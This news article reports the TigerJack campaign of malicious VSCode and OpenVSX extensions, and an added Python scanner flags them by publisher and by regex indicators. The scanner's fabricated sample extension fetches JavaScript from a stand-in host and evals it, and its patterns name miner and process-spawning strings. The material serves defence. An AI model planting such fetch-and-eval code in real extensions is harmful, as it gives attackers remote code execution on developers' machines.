In a new disclosure, security researchers revealed that a threat actor group called TigerJack has been publishing malicious extensions on Microsoft’s Visual Studio Code (VSCode) Marketplace and the OpenVSX registry to steal source code, plant cryptominers, and maintain remote access.
According to Koi Security’s findings, two of the campaign’s popular extensions – “C++ Playground” and “HTTP Format” – were removed from Microsoft’s marketplace after accumulating over 17,000 downloads, but the operation continues through re-uploads under fresh accounts.
“These extensions remain fully operational in the OpenVSX marketplace (used by Cursor, Windsurf, and other VS Code-compatible IDEs), continuing to steal code and mine cryptocurrency months after their removal from Microsoft’s platform,” Koi researchers said in a blog post.
Researchers have flagged it as a coordinated campaign spanning at least 11 extensions across three publisher accounts (ab-498, 498 and 498-00).
Trojanized extensions built for persistence
Koi’s analysis shows that each malicious extension serves a distinct role in TigerJack’s campaign. One variant quietly uploads the developer’s source code to external endpoints, another burns the machine’s local resources on cryptomining, and the most “sophisticated” variant fetches and executes JavaScript from a remote server, so the attackers can expand or change its behavior without ever publishing a new version of the extension.
Aditya Sood, VP of Security Engineering and AI Strategy at Aryaka, thinks the last capability is particularly dangerous, allowing TigerJack to push payloads such as credential stealers, ransomware, or API-harvesting scripts at will, opening the door to long-term supply chain compromise.
Because the payload is delivered as JavaScript fetched at runtime rather than shipped in an updated package, the extension’s published version never changes, which makes detection by static scanners or marketplace vetting far more difficult, the researchers added. The packaging is deceptive as well: the extensions masquerade as legitimate or popular tools, and in some cases the attackers even silently install the genuine tool being impersonated alongside the malicious functionality, so the advertised feature works and users have no reason for suspicion.
In essence, the campaign blends two capabilities: cryptomining and persistent backdoor control. In the mining variants, the extension deploys a miner that quietly consumes CPU (and sometimes GPU) cycles on developer machines, diverting the host’s processing power into illicit cryptocurrency generation.
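The behaviors described above (a blocklisted publisher, fetch-and-eval of remote JavaScript, workspace file reads paired with network calls, miner strings) are things a developer can check for on their own machine. The script below is an added example written for this article, not code from Koi Security or from the extensions themselves: it walks an extensions directory, reads each package.json, and flags extensions whose publisher is one of the three accounts named in the report or whose JavaScript matches generic heuristic patterns. The indicator regexes are constructed for this illustration (not signatures taken from the real extensions), the sample extension it builds in a temporary directory is fabricated, and the `~/.vscode/extensions/<publisher>.<name>-<version>` layout is assumed (Cursor and Windsurf keep their own extension directories). Treat hits as leads for manual review, since legitimate extensions also spawn processes and fetch URLs.

```python
import json
import re
import tempfile
from pathlib import Path

# Publisher accounts named in Koi Security's report.
KNOWN_BAD_PUBLISHERS = {"ab-498", "498", "498-00"}

# Heuristic source patterns for the behaviours the report describes.
# Assumption: these are generic indicators written for this example, not
# signatures extracted from the real extensions. They yield leads, not verdicts.
INDICATORS = {
    "remote_eval": re.compile(r"\b(eval|new\s+Function)\s*\("),
    "http_fetch": re.compile(r"\b(https?\.get|fetch|axios)\s*\("),
    "child_process": re.compile(r"require\(\s*['\"]child_process['\"]\s*\)"),
    "file_walk": re.compile(r"\b(readdirSync|readFileSync|glob)\s*\("),
    "miner_hint": re.compile(r"(stratum\+tcp|xmrig|cryptonight|monero)", re.I),
}


def scan_extension(ext_dir: Path) -> dict:
    """Inspect one installed extension directory (assumed to hold package.json)."""
    pkg = json.loads((ext_dir / "package.json").read_text(encoding="utf-8"))
    publisher = pkg.get("publisher", "")
    hits = set()
    for js in ext_dir.rglob("*.js"):
        text = js.read_text(encoding="utf-8", errors="ignore")
        hits.update(name for name, rx in INDICATORS.items() if rx.search(text))

    findings = []
    if publisher in KNOWN_BAD_PUBLISHERS:
        findings.append("publisher-on-blocklist")
    # Fetching code over HTTP and evaluating it is the "change the payload
    # without shipping a new version" pattern the report describes.
    if {"http_fetch", "remote_eval"} <= hits:
        findings.append("remote-code-execution-pattern")
    # Reading workspace files plus network access together suggests exfiltration.
    if {"file_walk", "http_fetch"} <= hits:
        findings.append("possible-source-exfiltration")
    if "miner_hint" in hits:
        findings.append("miner-indicator")
    if "child_process" in hits:
        findings.append("spawns-processes")
    return {
        "id": f"{publisher}.{pkg.get('name', '')}",
        "version": pkg.get("version", ""),
        "indicators": sorted(hits),
        "findings": findings,
    }


def scan_extensions_root(root) -> list:
    """Scan every extension directory under root (e.g. ~/.vscode/extensions)."""
    return [
        scan_extension(d)
        for d in sorted(Path(root).iterdir())
        if d.is_dir() and (d / "package.json").is_file()
    ]


def build_sample_root() -> Path:
    """Build a throwaway extensions directory holding one benign and one
    suspicious extension. Both are constructed for this example."""
    root = Path(tempfile.mkdtemp(prefix="ext-scan-"))

    benign = root / "goodpub.formatter-1.0.0"
    benign.mkdir()
    (benign / "package.json").write_text(json.dumps(
        {"name": "formatter", "publisher": "goodpub", "version": "1.0.0"}))
    (benign / "extension.js").write_text(
        "const vscode = require('vscode');\n"
        "exports.activate = ctx => ctx.subscriptions.push(\n"
        "  vscode.commands.registerCommand('formatter.run', () => {}));\n")

    suspect = root / "ab-498.httpformat-1.2.0"
    suspect.mkdir()
    (suspect / "package.json").write_text(json.dumps(
        {"name": "httpformat", "publisher": "ab-498", "version": "1.2.0"}))
    (suspect / "extension.js").write_text(
        "const https = require('https');\n"
        "const fs = require('fs');\n"
        "exports.activate = () => {\n"
        "  // fetch-and-eval: the payload can change without a new extension version\n"
        "  https.get('https://example.invalid/p.js', res => {\n"
        "    let body = ''; res.on('data', d => body += d); res.on('end', () => eval(body));\n"
        "  });\n"
        "  const files = fs.readdirSync(process.cwd());\n"
        "};\n")
    return root


if __name__ == "__main__":
    import sys
    # Pass a real extensions directory as argv[1]; otherwise scan the sample.
    target = sys.argv[1] if len(sys.argv) > 1 else build_sample_root()
    for r in scan_extensions_root(target):
        flag = "SUSPICIOUS" if r["findings"] else "ok"
        print(f"{flag:10} {r['id']}@{r['version']} {r['findings']}")
```

Run it as `python scan_extensions.py ~/.vscode/extensions` (or the equivalent directory for a VS Code-compatible IDE). Because the remote-execution variant never changes its version string, comparing the installed version against the marketplace listing tells you nothing; reading the shipped JavaScript for a fetch-then-eval sequence is the check that actually catches it.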
Coordinated multi-account operation
Koi researchers found 11 extensions across multiple accounts, making it a coordinated operation.
“This multi-account strategy provides redundancy when one account gets flagged, creates the illusion of independent developers, and demonstrates professional-level social engineering: GitHub repositories for credibility, consistent branding across extensions, detailed feature lists, professional marketplace presentations, and strategic naming that mimics legitimate tools (cppformat, pythonformat, httpformat),” the researchers said.
The analysis traced the malicious GitHub accounts back to a Facebook profile under the name “Zubaer Ahmed,” pointing to a likely operational slip that exposed the attacker’s real identity. The profile has since been taken down.
For developers and organizations relying heavily on VSCode or OpenVSX, the extensions could compromise not just a codebase but entire build environments or deployment pipelines, Sood noted. Compromised extensions can silently exfiltrate or tamper with source code that later moves into production, effectively turning VSCode into a vector for software supply-chain attacks. In collaborative environments, a single infected deployment could compromise shared repositories or inject backdoors into dependencies.
Koi researchers emphasized that TigerJack’s re-emergence reveals a deeper weakness in the extension ecosystem, with developer tools still relying on reputation and user ratings, rather than code auditing or signed binaries. “OpenVSX and other alternative marketplaces appear to have virtually no security detection mechanisms in place,” they said. “While Microsoft eventually identifies threats after months of damage, these platforms operate with minimal or no malware scanning whatsoever.”
Individuals using either of the impacted platforms should vet their extensions thoroughly and only download packages from reputable sources, Sood added. “Additionally, users should implement security measures that can raise alarms about potential vulnerabilities so users have the opportunity to close them before they’re exploited.”